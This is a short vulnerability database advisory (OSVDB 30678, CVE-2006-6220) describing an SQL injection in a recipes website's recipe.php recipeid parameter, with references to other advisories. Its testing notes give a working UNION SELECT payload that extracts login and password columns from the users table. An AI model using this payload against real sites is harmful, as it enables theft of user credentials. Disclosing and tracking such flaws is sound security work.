Recipes Website recipe.php recipeid Variable SQL Injection

2006-11-23T05:33:52
ID OSVDB:30678
Type osvdb
Reporter OSVDB
Modified 2006-11-23T05:33:52

Description

Manual Testing Notes

http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*

References:

Vendor URL: http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2 Secunia Advisory ID:23083 Related OSVDB ID: 30679 ISS X-Force ID: 30509 Generic Exploit URL: http://www.milw0rm.com/exploits/2834 FrSIRT Advisory: ADV-2006-4686 CVE-2006-6220 Bugtraq ID: 21270